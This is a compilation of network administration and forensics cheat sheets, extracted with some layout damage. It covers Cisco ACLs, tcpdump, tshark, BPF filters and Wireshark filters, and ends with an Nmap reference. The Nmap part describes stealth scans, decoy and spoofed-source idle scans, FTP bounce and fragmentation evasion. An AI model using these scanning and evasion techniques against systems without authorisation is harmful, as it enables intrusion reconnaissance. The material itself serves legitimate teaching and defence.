Extended ACLs, which offer the ability to filter or control traffic based on a variety of criteria such as source or destination IP addresses, as well as protocol type such as, ICMP, TCP, UDP, or IP. These ACLs are numbered from 100–199 and from 2000–2699.
To create a standard ACL, you can use the following example which will create an ACL that allows traffic for the 192.168.8.0/24 network.
Switch1>enable Switch1#configure terminal Switch1(config)#access-list 50 permit 192.168.8.0 0.0.0.255
To create an extended ACL you can use the following example which will create an ACL that allows traffic with addresses in the 192.168.8.0/24 network and tcp ports of either 80 (http) or 443 (https):
Router1>enable Router1#configure terminal Router1(config)#access-list 101 remark This ACL is to control the outbound router traffic. Router1(config)#access-list 101 permit tcp 192.168.8.0 0.0.0.255 any eq 80 Router1(config)#access-list 101 permit tcp 192.168.8.0 0.0.0.255 any eq 443
Securing your Cisco network by applying an access control list
After you have created an Access Control List (ACL), such as ACL 101 created above, you can apply that ACL to an interface. In the following example, this ACL is placed to restrict outbound traffic on FastEthernet0/1.
Router1>enable Router1#configure terminal Router1(config)#interface FastEthernet0/1 Router1(config-if)#ip access-group 101 out
PORT SECURITY
Switch>enable
Password: cisco
Switch#show running-config
Switch#configure terminal
Switch(config)#interface fa0/12
Switch(config-if)#switchport mode access
Switch(config-if)#switchport port-security
Switch(config-if)#switchport port-security maximum 2
Switch(config-if)#switchport port-security violation shutdown
Switch(config-if)#no shutdown
Switch(config-if)#end
Switch#show port-security interface fa0/12
Switch#copy running-config startup-config
Cisco Access Control Lists: Standard ACL: 1 – 99 and 1300 – 1999
Use a remark to describe the ACL (Optional): 1 R1(config)# access-list 1 remark ACL TO DENY
1319
ACCESS FROM SALES VLAN
Create the ACL, keeping the following in mind:
o ACL uses first-match logic.
o There is an implicit deny anyat the end of the ACL.
1 2 3 4 5
R1(config)# access-list 2 deny 192.168.1.77 R1(config)# access-list 2 deny 192.168.1.64
0.0.0.31 R1(config)# access-list 2 permit 10.1.0.0
0.0.255.255 R1(config)# access-list 2 deny 10.0.0.0
0.255.255.255 R1(config)# access-list 2 permit any
Enable the ACL on the chosen router interface in the correct direction (in or out): 1 R1(config-if)# ip access-group 2 out
Using standard ACL to limit telnet and SSH access to a router: Create the ACL that defines the permitted telnet clients:
1 2
R1(config)# access-list 99 remark ALLOWED TELNET
CLIENTS R1(config)# access-list 99 permit 192.168.1.128
0.0.0.15
Apply the ACL inbound the vty lines 1 2
R1(config)# line vty 0 4 R1(config-line)# access-class 99 in
Extended ACL: 100 – 199 and 2000 – 2699
Extended ACL should be placed as close as possible to the source of the packet.
Extended ACL matches packets based on source & des.IP addresses, protocol, source & des. Port numbers andother criteria as well
1 2 3 4 5 6 7 8 9
R1(config)# access-list 101 remark MY_ACCESS_LIST R1(config)# access-list 101 deny iphost 10.1.1.1
host 10.2.2.2 R1(config)# access-list 101 deny tcp 10.1.1.0
0.0.0.255 any eq 23 R1(config)# access-list 101 deny icmp 10.1.1.1
0.0.0.0 any R1(config)# access-list 101 deny tcphost 10.1.1.0
host 10.0.0.1 eq 80 R1(config)# access-list 101 deny udphost 10.1.1.7
eq 53 any R1(config)# access-list 101 permit ip any any R1(config)# interface fastEthernet 0/0 R1(config-if)# ip access-group 101 in
Named ACL:
Named ACLs use names to identify ACLs rather than numbers, and commands that permit or deny traffic are written in a sub mode called named ACL mode (nacl).
Named ACL enables the editing of the ACL (deleting or inserting statements) by sequencing statements of the ACL.
Named standard ACL:
1 2 3 4 5 6
R1(config)# ip access-list standard
MY_STANDARD_ACL R1(config-std-nacl)# permit 10.1.1.0 0.0.0.255 R1(config-std-nacl)# deny 10.2.2.2 R1(config-std-nacl)# permit any R1(config)# interface fastEthernet 0/1 R1(config-if)# ip access-group MY_STANDARD_ACL out
Named extended ACL:
1 2 3 4 5 6
R1(config)# ip access-list extended
MY_EXTENDED_ACL R1(config-ext-nacl)# deny icmp 10.1.1.1 0.0.0.0
any R1(config-ext-nacl)# deny tcphost 10.1.1.0 host
10.0.0.1 eq 80 R1(config-ext-nacl)# permit ip any any R1(config)# interface fastEthernet 0/1 R1(config-if)# ip access-group MY_EXTENDED_ACL in
Editing ACL using sequence numbers:
1 2 3 4
R1(config)# ip access-list extended
MY_EXTENDED_ACL R1(config-ext-nacl)# no 20 ! Deletes the
statement of sequence number 20 R1(config)# ip access-list standard 99 R1(config-std-nacl)# 5 deny 1.1.1.1 ! inserts a
statement with sequence 5
1420
== ARGUS ==
ra [options] [-- filter-expression]
-n
Suppress port number to service conversion.
-r
[- | <file file ...>]
Read data from <files> in the order presen-
ted on the commandline. '-' denotes stdin
(default).
-R
<dir dir ...>
Recursively descend the directory and pro-
cess all the regular files that are en-
countered.
-w
<file>
Append matching data to <file>, in argus
file format. An output-file of '-' directs
ra to write the argus(5) records to stdout,
allowing for "chaining" ra* style commands
together.
racluster [-m aggregation-objects][options]
[-- filter-expression]
Supported aggregation-objects are:
saddr/[l|m]
source IP addr/[cidr len |
m.a.s.k].
daddr/[l|m]
destination IP addr/[cidr len |
m.a.s.k].
proto
transaction protocol.
sport
source port number. Implies use
of 'proto'.
dport
destination port number.
Implies use of 'proto'.
Generate a HOSTS file (like /etc/hosts) based on
DNS lookups in a PCAP file:
tshark -r dump.pcap -q -z hosts > hosts.txt
Print Protocol Hierarchy Statistics (PHS) lis-
ting for all traffic in dump.pcap
tshark -r dump.pcap -q -z io,phs
== NGREP ==
ngrep <-iqvx> <-IO pcap_dump > < -n num > <
match expression > < bpf filter >
-i
Ignore case for the regex expression.
-q
Be quiet; don't output any information ot-
her than packet headers and their payloads
(if relevant).
-v
Invert the match; only display packets that
don't match.
-x
Dump packet contents as hexadecimal as well
as ASCII.
-I
pcap_dump
Input file pcap file into ngrep.
-O
pcap_dump
Output matched packets to a pcap file.
-n
num
Match only num packets total, then exit.
match expression
A match expression is an extended regular
expression.
bpf filter
Selects a filter that specifies what pack-
ets will be dumped.
EXAMPLES
Search a PCAP file for packets containing the
email address "[email protected]"
ngrep -I dump.pcap -q [email protected]
Search for DNS requests (to port 53) for
"pwned.se"
ngrep -I snort.log.1428364808 -q -i pwned.se dst
port 53
Hands-o
n N
etw
ork
Fore
nsic
s
Work
shop C
heat
Sheet
www.forsva
rsmak
ten.se
Unzip the VirtualBox machine from Hands-
on_Network_Forensics.zip on your USB thumb drive
to your local hard drive
Start VirtualBox and run the Security Onion VM
Usernames/Passwords
Security Onion VM
user / password
ELSA : https://127.0.0.1/elsa/
user / password
Squert : https://127.0.0.1/squert/
user / password
Snorby : https://127.0.0.1:444/
[email protected] / password
Xplico : https://127.0.0.1:9876/
xplico / xplico
Paths
PCAP files:
/nsm/sensor_data/securityonion_eth1/dailylogs/
Argus files:
/nsm/sensor_data/securityonion_eth1/argus/
Bro-IDS logs:
/nsm/bro/logs/
ip_whitelist.py
/usr/local/bin/ip_whitelist.py
21
rasort [-m sort-fields] [options] [-- filter-
expression]
Supported sort-fields are:
stime
record start time <default>
dur
record total duration.
saddr[/cidr]
source IP addr, with optional
cidr specification for IPv4
addresses.
daddr[/cidr]
destination IP addr, with
optional cidr specification for
IPv4 addresses.
sport
source port number.
dport
destination port number.
bytes
total transaction bytes.
sbytes
src -> dst transaction bytes.
dbytes
dst -> src transaction bytes.
pkts
total transaction packet count.
spkts
src -> dst packet count.
dpkts
dst -> src packet count.
rafilteraddr
[-f address.file] [-v] [options]
[-- filter-expression]
-v
Invert the logic and print flows that don't
match any of the addresses.
EXAMPLES
List all flows to/from the class C network
217.195.49.0/24 in chronological order based on
start time:
racluster -R * -w - -- net 217.195.49.0/24 |
rasort -m stime -n
List all flows to/from 192.168.0.53, where the
remote IP is not listed in ip_whitelist.txt.
Sort flows based on bytes sent from the server:
rafilteraddr -R * -v -f /usr/local/etc/
ip_whitelist.txt -w - -- host 192.168.0.53 |
racluster -w - | rasort -m dbytes -n
== TCPDUMP ==
tcpdump [ -n ] [ -c count ] [ -i interface ] [ -
r file ] [ -w file ] [ filter-expression ]
-c
Exit after receiving count packets.
-i
Sniff packets from interface.
-n
Don't convert addresses (i.e., host addres-
ses, port numbers, etc.) to names.
-r
Read packets from file.
-w
Write the raw packets to file rather than
parsing and printing them out.
EXAMPLES
Sniff and print DNS packets to stdout:
tcpdump -i eth0 -n port 53
Capture 100 packets from eth0 to sniffed.pcap:
tcpdump -i eth0 -c 100 -w sniffed.pcap
Filter a PCAP file to only include traffic to/
from 217.195.49.146 into a new PCAP file:
tcpdump -r snort.log.1426118407 -w /var/
tmp/217.195.49.146.pcap host 217.195.49.146
== TCPFLOW ==
Tcpflow [-BcC] [-AH] [-b max_bytes] [-i iface]
[-r file1.pcap] [expression]
-B
Force binary output even when printing to
console with -C or -c.
-b
Capture no more than max_bytes bytes per
flow.
-c
Console print (stdout), without storing any
captured data to files
-C
Console print without the packet source and
destination details being printed.
-AH Perform HTTP post-processing ("After" pro-
cessing) to extract HTTP payloads.
-i
Capture packets from the network interface
named iface.
-r
Read from PCAP file.
EXAMPLE
Extract contents of POP3 sessions (TCP 110):
tcpflow -r emails.pcap port 110
== TSHARK ==
tshark [ -c <packet count> ] [ -e <field> ] [ -
n ] [ -q ] [ -r <infile> ] [ -R <read (display)
filter> ] [ -T fields ][ -w <outfile>|- ] [ -x ]
[ -z <statistics> ]
-c
<packet count>
Set the maximum number of packets to read.
-e
<field>
Add a field to the list of fields to dis-
play if -T fields is selected.
-n
Disable network object name resolution
(such as hostname, TCP and UDP port names).
-q
Don't print packet information; this is
useful if you're using a -z option to cal-
culate statistics and don't want the packet
information printed, just the statistics.
-r
<infile>
Read packet data from infile.
-R
<read (display) filter>
Cause the specified filter to be applied.
-T
fields
Set the format of the output when viewing
decoded packet data. The values of fields
specified with the -e option.
-w
<outfile> | -
Write raw packet data to outfile or to the
standard output if outfile is '-'.
-x
Cause TShark to print a hex and ASCII dump
of the packet data after printing the sum-
mary or details.
-z
<statistics>
Get TShark to collect various types of
statistics and display the result after fi-
nishing reading the capture file. Use the
-q flag if you're reading a capture file
and only want the statistics printed.
EXAMPLES
Print client IP and HTTP URI for all HTTP re-
quests containing the string "index.html":
tshark -r dump.pcap -R "http.request.uri con-
tains index.html" -T fields -e ip.src -e
http.request.uri
22
packetlife.net
by Jeremy Stretch v2.0
Command Line Options
-A Print frame payload in ASCII
-c <count> Exit after capturing count packets
-D List available interfaces
-e Print link-level headers
-F <file> Use file as the filter expression
-G <n> Rotate the dump file every n seconds
-i <iface> Specifies the capture interface
-K Don't verify TCP checksums
-L List data link types for the interface
-n Don't convert addresses to names
-p Don't capture in promiscuous mode
-q Quick output
-r <file> Read packets from file
-s <len> Capture up to len bytes per packet
-S Print absolute TCP sequence numbers
-t Don't print timestamps
-v[v[v]] Print more verbose output
-w <file> Write captured packets to file
-x Print frame payload in hex
-X Print frame payload in hex and ASCII
-y <type> Specify the data link type
-Z <user> Drop privileges from root to user
Capture Filter Primitives
[src|dst] host <host> Matches a host as the IP source, destination, or either
ether [src|dst] host <ehost> Matches a host as the Ethernet source, destination, or either
gateway host <host> Matches packets which used host as a gateway
[src|dst] net <network>/<len> Matches packets to or from an endpoint residing in network
[tcp|udp] [src|dst] port <port> Matches TCP or UDP packets sent to/from port
[tcp|udp] [src|dst] portrange <p1>-<p2> Matches TCP or UDP packets to/from a port in the given range
less <length> Matches packets less than or equal to length
greater <length> Matches packets greater than or equal to length
(ether|ip|ip6) proto <protocol> Matches an Ethernet, IPv4, or IPv6 protocol
(ether|ip) broadcast Matches Ethernet or IPv4 broadcasts
(ether|ip|ip6) multicast Matches Ethernet, IPv4, or IPv6 multicasts
type (mgt|ctl|data) [subtype <subtype>] Matches 802.11 frames based on type and optional subtype
vlan [<vlan>] Matches 802.1Q frames, optionally with a VLAN ID of vlan
mpls [<label>] Matches MPLS packets, optionally with a label of label
<expr> <relop> <expr> Matches packets by an arbitrary expression
Protocols
arp
TCP Flags
tcp-urg tcp-rst
tcp-ack tcp-syn
tcp-psh tcp-fin
ether
fddi
icmp
ip
ip6
link
ppp
radio
rarp
slip
tcp
tr
udp
wlan
Modifiers
! or not
&& or and
|| or or
Examples
udp dst port not 53
host 10.0.0.1 && host 10.0.0.2
tcp dst port 80 or 8080
UDP not bound for port 53
Traffic between these hosts
Packets to either TCP port
ICMP Types
icmp-echoreply icmp-routeradvert icmp-tstampreply
icmp-unreach icmp-routersolicit icmp-ireq
icmp-sourcequench icmp-timxceed icmp-ireqreply
icmp-redirect icmp-paramprob icmp-maskreq
icmp-echo icmp-tstamp icmp-maskreply
TCPDUMP
1523
Berkeley Packet Filters – The Basics
Created by Jeff Stebelton and edited by Chris Davis
Introduction
What are Berkeley Packet Filters? BPF’s are a raw (protocol independent) socket interface
to the data link layer that allows filtering of packets in a very granular fashion1.
Working with BPF
If you use tcpdump for very long, you encounter what are called “primitives”, filter
expressions to tune your results to only see certain traffic. Examples of primitives are “net”,
“port” “addr” and qualifiers to those such as “src” or “dst”.
With these we can limit our results using filters such as ‘src host 10.10.1.1’ or ‘net 10.10’.
There are many of these (see the man page of tcpdump for the full list)
You can also specify protocols, such as “ip”, “tcp”, or “icmp”. Some even make
comparisons, such as “less” and “greater” for packet length.
These primitives are short cuts for BPF’s. Each one references some field or fields in one of
the network protocol headers. For example, the embedded protocol field in the IP header is
the 9th
byte offset from 0. If the value contained there is a 6, the packet is TCP. So the
primitive “tcp” really means show me all the packets in the IP header whose 9th
byte offset
from 0 contains a 6. If we wrote this as a BPF, it would look like this: ‘ip[9] = 6’ or using hex,
‘ip[9] = 0x06’ .
BPF’s can go far beyond the built‐in primitives, allowing us to get as granular as needed,
down the single bit level. If a field does not span the entire byte, we’ll need to write a BPF
to look at the bits in question to determine the value there.
Let’s look at the first line of the IP header3
to see an example.
Byte 0 Byte 1 Byte 2 Byte 3
IP Version IP Header
length
Type of
Service
Total Length
We see byte 0 (we start counting from 0, which is what we mean by offset from 0) that
there are two fields in the byte, the IP Version field and the IP Header Length Field.
If we wanted to see what the IP version of the packet is, how we would do this? We only
want the value in the high order nibble (high order = left most as we count bits from right to
left, and a nibble is 4 bits, or half a byte). To see that value we have to extract it from the
1
1624
byte of data somehow and look at it singularly. To do this, we employ a method know as
bitmasking. Bitmasking is simply filtering out the bits we don’t wish to look at and retaining
the ones we do.
To accomplish this, we’ll perform a bitwise AND operation on all of the bits in the byte. If
we AND the bits, only the ones with a value of 1 will be retained. Let’s look at this.
Here’s a binary representation of a typical first byte in the IP header:
0 1 0 0 0 1 0 1
We’ve separated the two nibbles here for clarity. We see the low order nibble (right‐most)
has 0101. This is our IP header length. We want to check the high order nibble, which has
the value 0100. To do this we will add 1 to each bit. In a bitwise AND, any values except two
1’s equal 0. Two 1’s equal one.
So to manipulate the bits to see the first nibble only, we want to add 1’s to the high order
nibble and 0’s to the lower order. Since all 1’s will equal F in hex, we will write an
expression adding hex F to the first nibble and 0 to the second.
Here’s what the BPF will look like:
'ip[0] & 0xF0 = 0x40' (our search value). Alternate decimal version 'ip[0] & 0xF0 = 64'
Broken down, we are telling tcpdump to look at the IP header (ip), first byte offset from 0
( [0] ), retain all the bits in the first nibble and discard all the bits in the low order nibble ( &
0xF0 ) and show us all the packets with a value of 4 in that nibble ( = 4).
Here’s our bit wise operation…
0 1 0 0 0 1 0 1
1 1 1 1 0 0 0 0
0 1 0 0 0 0 0 0
We now see the low order nibble has been filtered (all 0’s) and we have the high order
nibble left. Binary 0100 = decimal 4, so this shows us the packet has value of 4 in the high
order nibble of the first byte; the IP header is set to IPv4.
Sample Filters
Now that we see how BPF’s work, here are some samples of filters we can search on:
'ip[9] = 0x11' udp
'ip[9] = 0x01' icmp
'tcp[2:2]' 2nd byte, spanning two bytes
2
1725
'icmp[0] = 0x08' echo request packet
'tcp[2:2] < 0x14' tcp dest port < 20
Let’s create a filter for one of the more common and more complex uses: TCP Flags
The flags field in TCP is found at the 13th
byte offset from 0. The flags themselves inhabit all
of the lower order nibble, and the two lower order bits of the high order nibble.
The two high order bits of the high order nibble are used for ECN (Explicit Congestion
Notification). Here’s our layout…
TCP Byte 13
Let’s assume we wish to see all packets with the SYN and FIN flags set. This is anomalous
behavior and usually indicative of a port scanning method.
High order nibble Low order nibble
128 64 32 16 -- 8 4 2 1 <--- Binary for the entire byte
CWR ECE Urg Ack ‐‐ ‐‐ ‐‐ ‐‐ Push Reset Syn Fin
0 0 0 0 ‐‐‐‐‐‐‐‐ 0 0 1 1 <------ each nibble converted directly to hex is 0x03
Using the above chart, you can get hex values for filters but can also use the
If we simply wanted to get all ip packets with ONLY syn/fin set then we would use the
following filter:
'ip[13] = 0x03'
In this past example, we tell tcpdump to go to the 13th offset of the ip header (flags field)
and search for packets that have an exact value of 0x03 in hex. However, what if we
wanted all packets that had syn/fin regardless if they had additional flags?
‘ip[13] & 0x03 = 0x03’
This Filter will grab ALL packets with any number of combination flags so long as they have
the syn/fin flags set.
Now that we know how to look at only the bits we need, we can apply this to any field, in
any network header. You can, of course, string multiple filters together to get as specific as
needed. Here’s a tcpdump query to show us all packets with the Syn flag set, and a
datagram (packet) size greater than 134 bytes (probable data on the Syn packet), and an IP
version that is NOT 4:
'tcpdump –nn –i eth0 ‘tcp[13] & 0x02 = 2 and ip[2:2] > 0x86 and ip[0] & 0xF0 != 4’
3
1826
Wireshark Capture Filters
Examples
Capture only traffic to or from IP address 172.18.5.4:
host 172.18.5.4
Capture traffic to or from a range of IP addresses:
net 192.168.0.0/24
or
net 192.168.0.0 mask 255.255.255.0
Capture traffic from a range of IP addresses:
src net 192.168.0.0/24
or
src net 192.168.0.0 mask 255.255.255.0
Capture traffic to a range of IP addresses:
dst net 192.168.0.0/24
or
dst net 192.168.0.0 mask 255.255.255.0
Capture only DNS (port 53) traffic:
port 53
Capture non-HTTP and non-SMTP traffic on your server (both are equivalent):
host www.example.com and not (port 80 or port 25)
host www.example.com and not port 80 and not port 25
Capture except all ARP and DNS traffic:
port not 53 and not arp
Capture traffic within a range of ports
(tcp[0:2] > 1500 and tcp[0:2] < 1550) or (tcp[2:2] > 1500 and tcp[2:2] < 1550)
or, with newer versions of libpcap (0.9.1 and later):
tcp portrange 1501-1549
Capture only Ethernet type EAPOL:
ether proto 0x888e
Reject ethernet frames towards the Link Layer Discovery Protocol Multicast group:
not ether dst 01:80:c2:00:00:0e
Capture only IP traffic - the shortest filter, but sometimes very useful to get rid of lower layer protocols like ARP and STP:
ip
Capture only unicast traffic - useful to get rid of noise on the network if you only want to see traffic to and from your machine, not, for example, broadcast and
multicast announcements:
not broadcast and not multicast
Capture IPv6 "all nodes" (router and neighbor advertisement) traffic. Can be used to find rogue RAs:
dst host ff02::1
Capture HTTP GET requests. This looks for the bytes 'G', 'E', 'T', and ' ' (hex values 47, 45, 54, and 20) just after the TCP header. "tcp[12:1] & 0xf0) >> 2" figures out the TCP header length. From Jefferson Ogata via the tcpdump-workers mailing list.
port 80 and tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420
1927
packetlife.net
by Jeremy Stretch v2.0
WIRESHARK DISPLAY FILTERS · PART 1Ethernet
eth.addr eth.srceth.len
eth.dst eth.trailereth.lg
eth.ig eth.typeeth.multicast
IEEE 802.1Q
vlan.cfi vlan.priorityvlan.id
vlan.etype vlan.trailervlan.len
IPv4
ARP
ip.fragment.overlap.conflictip.addr
ip.checksum ip.fragment.toolongfragment
ip.fragmentsip.checksum_bad
ip.checksum_good ip.hdr_len
ip.hostip.dsfield
ip.dsfield.ce ip.id
ip.lenip.dsfield.dscp
ip.dsfield.ect ip.proto
ip.reassembled_inip.dst
ip.dst_host ip.src
ip.src_hostip.flags
ip.flags.df ip.tos
ip.tos.costip.flags.mf
ip.flags.rb ip.tos.delay
ip.tos.precedenceip.frag_offset
ip.fragment ip.tos.reliability
ip.tos.throughputip.fragment.error
ip.fragment.multipletails ip.ttl
ip.versionip.fragment.overlap
IPv6
ipv6.hop_optipv6.addr
ipv6.class ipv6.host
ipv6.mipv6_home_addressipv6.dst
ipv6.dst_host ipv6.mipv6_length
ipv6.mipv6_typeipv6.dst_opt
ipv6.flow ipv6.nxt
ipv6.opt.pad1ipv6.fragment
ipv6.fragment.error ipv6.opt.padn
ipv6.plenipv6.fragment.more
ipv6.fragment.multipletails ipv6.reassembled_in
ipv6.routing_hdripv6.fragment.offset
ipv6.fragment.overlap ipv6.routing_hdr.addr
ipv6.routing_hdr.leftipv6.fragment.overlap.conflict
ipv6.fragment.toolongfragment ipv6.routing_hdr.type
ipv6.srcipv6.fragments
ipv6.fragment.id ipv6.src_host
ipv6.versionipv6.hlim
arp.dst.hw_mac arp.proto.size
arp.dst.proto_ipv4 arp.proto.type
arp.hw.size arp.src.hw_mac
arp.hw.type arp.src.proto_ipv4
arp.opcode
TCP
tcp.options.qstcp.ack
tcp.checksum tcp.options.sack
tcp.options.sack_letcp.checksum_bad
tcp.checksum_good tcp.options.sack_perm
tcp.options.sack_retcp.continuation_to
tcp.dstport tcp.options.time_stamp
tcp.options.wscaletcp.flags
tcp.flags.ack tcp.options.wscale_val
tcp.pdu.last_frametcp.flags.cwr
tcp.flags.ecn tcp.pdu.size
tcp.pdu.timetcp.flags.fin
tcp.flags.push tcp.port
tcp.reassembled_intcp.flags.reset
tcp.flags.syn tcp.segment
tcp.segment.errortcp.flags.urg
tcp.hdr_len tcp.segment.multipletails
tcp.segment.overlaptcp.len
tcp.nxtseq tcp.segment.overlap.conflict
tcp.segment.toolongfragmenttcp.options
tcp.options.cc tcp.segments
tcp.seqtcp.options.ccecho
tcp.options.ccnew tcp.srcport
tcp.time_deltatcp.options.echo
tcp.options.echo_reply tcp.time_relative
tcp.urgent_pointertcp.options.md5
tcp.options.mss tcp.window_size
tcp.options.mss_val
UDP
udp.checksum udp.srcportudp.dstport
udp.checksum_bad udp.length
udp.checksum_good udp.port
Operators
eq or ==
ne or !=
gt or >
lt or <
ge or >=
le or <=
Logic
Logical ANDand or &&
or or || Logical OR
Logical XORxor or ^^
not or ! Logical NOT
Substring operator[n] […]
2028
packetlife.net
by Jeremy Stretch v2.0
WIRESHARK DISPLAY FILTERS · PART 2Frame Relay
fr.defr.becn
fr.chdlctype fr.dlci
fr.dlcore_controlfr.control
fr.control.f fr.ea
fr.fecnfr.control.ftype
fr.control.n_r fr.lower_dlci
fr.nlpidfr.control.n_s
fr.control.p fr.second_dlci
fr.snap.ouifr.control.s_ftype
fr.control.u_modifier_cmd fr.snap.pid
fr.snaptypefr.control.u_modifier_resp
fr.cr fr.third_dlci
fr.upper_dlcifr.dc
ICMPv6
icmpv6.all_comp
icmpv6.checksum
icmpv6.option.name_type.fqdn
icmpv6.option.name_x501
icmpv6.checksum_bad
icmpv6.code
icmpv6.option.rsa.key_hash
icmpv6.option.type
icmpv6.comp
icmpv6.haad.ha_addrs
icmpv6.ra.cur_hop_limit
icmpv6.ra.reachable_time
icmpv6.identifier
icmpv6.option
icmpv6.ra.retrans_timer
icmpv6.ra.router_lifetime
icmpv6.option.cga
icmpv6.option.length
icmpv6.recursive_dns_serv
icmpv6.type
icmpv6.option.name_type
RIP
BGP
bgp.mp_reach_nlri_ipv4_prefixbgp.aggregator_as
bgp.aggregator_origin bgp.mp_unreach_nlri_ipv4_prefix
bgp.multi_exit_discbgp.as_path
bgp.cluster_identifier bgp.next_hop
bgp.nlri_prefixbgp.cluster_list
bgp.community_as bgp.origin
bgp.originator_idbgp.community_value
bgp.local_pref bgp.type
bgp.withdrawn_prefixbgp.mp_nlri_tnl_id
HTTP
http.proxy_authorizationhttp.accept
http.accept_encoding http.proxy_connect_host
http.proxy_connect_porthttp.accept_language
http.authbasic http.referer
http.requesthttp.authorization
http.cache_control http.request.method
http.request.urihttp.connection
http.content_encoding http.request.version
http.responsehttp.content_length
http.content_type http.response.code
http.serverhttp.cookie
http.date http.set_cookie
http.transfer_encodinghttp.host
http.last_modified http.user_agent
http.www_authenticatehttp.location
http.notification http.x_forwarded_for
http.proxy_authenticate
PPP
ppp.address ppp.direction
ppp.control ppp.protocol
rip.auth.passwd rip.route_tagrip.ip
rip.auth.type rip.routing_domainrip.metric
rip.command rip.versionrip.netmask
rip.family rip.next_hop
MPLS
mpls.oam.defect_locationmpls.bottom
mpls.cw.control mpls.oam.defect_type
mpls.oam.frequencympls.cw.res
mpls.exp mpls.oam.function_type
mpls.oam.ttsimpls.label
mpls.oam.bip16 mpls.ttl
ICMP
icmp.checksum icmp.seqicmp.ident
icmp.checksum_bad icmp.typeicmp.mtu
icmp.code icmp.redir_gw
DTP
dtp.neighbor vtp.neighbordtp.tlv_type
dtp.tlv_len dtp.version
VTP
vtp.vlan_info.802_10_indexvtp.code
vtp.conf_rev_num vtp.vlan_info.isl_vlan_id
vtp.vlan_info.lenvtp.followers
vtp.md vtp.vlan_info.mtu_size
vtp.vlan_info.status.vlan_suspvtp.md5_digest
vtp.md_len vtp.vlan_info.tlv_len
vtp.vlan_info.tlv_typevtp.seq_num
vtp.start_value vtp.vlan_info.vlan_name
vtp.vlan_info.vlan_name_lenvtp.upd_id
vtp.upd_ts vtp.vlan_info.vlan_type
vtp.version
2129
SCAN OPTION SUMMARY
Scan Name Command Syntax
Requires Privileged
Access
Identifies TCP Ports
Identifies UDP Ports
TCP SYN Scan -sS YES YES NO
TCP connect() Scan -sT NO YES NO
FIN Stealth Scan -sF YES YES NO
Xmas Tree Stealth Scan -sX YES YES NO
Null Stealth Scan -sN YES YES NO
Ping Scan -sP NO NO NO
Version Detection -sV NO NO NO
UDP Scan -sU YES NO YES
IP Protocol Scan -sO YES NO NO
ACK Scan -sA YES YES NO
Window Scan -sW YES YES NO
RPC Scan -sR NO NO NO
List Scan -sL NO NO NO
Idlescan -sI YES YES NO
FTP Bounce Attack -b NO YES NO
PING OPTIONS
ICMP Echo Request Ping -PE, -PI
TCP ACK Ping -PA[portlist], -PT[portlist]
TCP SYN Ping -PS[portlist]
UDP Ping -PU[portlist]
ICMP Timestamp Ping -PP
ICMP Address Mask Ping -PM
Don�’t Ping -P0, -PN, -PD
Require Reverse -R
Disable Reverse DNS -n
Specify DNS Servers --dns-servers
HOST AND PORT OPTIONS
Exclude Targets --exclude <host1 [,host2],...>
Exclude Targets in File --excludefile <exclude_file>
Read Targets from File -iL <inputfilename>
Pick Random Numbers for Targets -iR <num_hosts>
Randomize Hosts --randomize_hosts, -rH
No Random Ports -r
Source Port --source-port <portnumber>
Specify Protocol or Port Numbers -p <port_range>
Fast Scan Mode -F
Create Decoys -D <decoy1 [,decoy2][,ME],...>
Source Address -S <IP_address>
Interface -e <interface>
List Interfaces --iflist
LOGGING OPTIONS
Normal Format -oN <logfilename>
XML Format -oX <logfilename>
Grepable Format -oG <logfilename>
All Formats -oA <basefilename>
Script Kiddie Format -oS <logfilename>
Resume Scan --resume <logfilename>
Append Output --append-output
REAL-TIME INFORMATION OPTIONS
Verbose Mode --verbose, -v
Version Trace --version-trace
Packet Trace --packet-trace
Debug Mode --debug, -d
Interactive Mode --interactive
Noninteractive Mode --noninteractive
TUNING AND TIMING OPTIONS
Time to Live --ttl
Use Fragmented IP Packets -f, -ff
Maximum Transmission Unit --mtu <databytes>
Data Length --data-length <databytes>
Host Timeout --host-timeout <milliseconds>
Initial Round Trip Timeout --initial-rtt-timeout <milliseconds>
Minimum Round Trip Timeout --min-rtt-timeout <milliseconds>
Maximum Round Trip Timeout --max-rtt-timeout <milliseconds>
Maximum Parallel Hosts per Scan --max-hostgroup <number>
Minimum Parallel Hosts per Scan --min-hostgroup <number>
Maximum Parallel Port Scans --max-parallelism <number>
Minimum Parallel Port Scans --min-parallelism <number>
Minimum Delay Between Probes --scan-delay <milliseconds>
Maximum Delay Between Probes --max-scan-delay
Timing Policies --timing, -T<0|1|2|3|4|5>
MISCELLANEOUS OPTIONS
Quick Reference Screen --help, -h Nmap Version --version, -V
Data Directory --datadir <directory_name>
Quash Argument Vector -q
Define Custom Scan Flags --scanflags <flagval>
(Uriel) Maimon Scan -sM
IPv6 Support -6
Send Bad TCP or UDP Checksum --badsum
Copyright © 2007 Professor Messer, LLC, All Rights Reservedhttp://www.ProfessorMesser.com SNC-201
NMAP Professor Messer�’s Quick Reference Guide to
OPERATING SYSTEM FINGERPRINTING
OS Fingerprinting -O
Limit System Scanning --osscan-limit
More Guessing Flexibility --osscan-guess, --fuzzy
Additional, Advanced, and Aggressive -A
VERSION DETECTION
Version Scan -sV
Don�’t Exclude Any Ports --allports
Set Version Intensity --version-intensity
Enable Version Scanning Light --version-light
Enable Version Scan All --version-all
RUN-TIME INTERACTIONS
Display Run-Time Help ? Increase / Decrease Verbosity v / V Increase / Decrease Debugging d / D
Increase / Decrease Packet Tracing p / P
Any Other Key Print Status
2230
Copyright © 2007 Professor Messer, LLC, All Rights Reservedhttp://www.ProfessorMesser.com SNC-201
TCP SYN SCAN (-sS)
Identifying Open Ports with Nmap
TCP connect() SCAN (-sT)
TCP FIN SCAN (-sF)
TCP XMAS TREE SCAN (-sX)
TCP NULL SCAN (-sN)
TCP PING SCAN (-sP)
VERSION DETECTION SCAN (-sV)
UDP SCAN (-sU)
TCP ACK SCAN (-sA)
IP PROTOCOL SCAN (-sO)
TCP WINDOW SCAN (-sW)
IDLESCAN (-sI <zombie host:[probeport]>)
FTP BOUNCE ATTACK (-b <ftp_relay_host>)
Version scan identifies open ports with a TCP SYN scan...
...and then queries the port with a customized signature.
Step 1: Nmap sends a SYN/ACK to the zombie workstation to induce a RST in return. This RST frame contains the initial IPID that nmap will remember for later.
Step 2: Nmap sends a SYN frame to the destination address, but nmap spoofs the IP address to make it seem as if the SYN frame was sent from the zombie workstation.
Step 3: Nmap repeats the original SYN/ACK probe of the zom-bie station. If the IPID has incremented, then the port that was spoofed in the original SYN frame is open on the destination device.
A closed port will result with the FTP server informing the source station that the FTP server can�’t build the connection.
An open port completes the transfer over the specified connection.
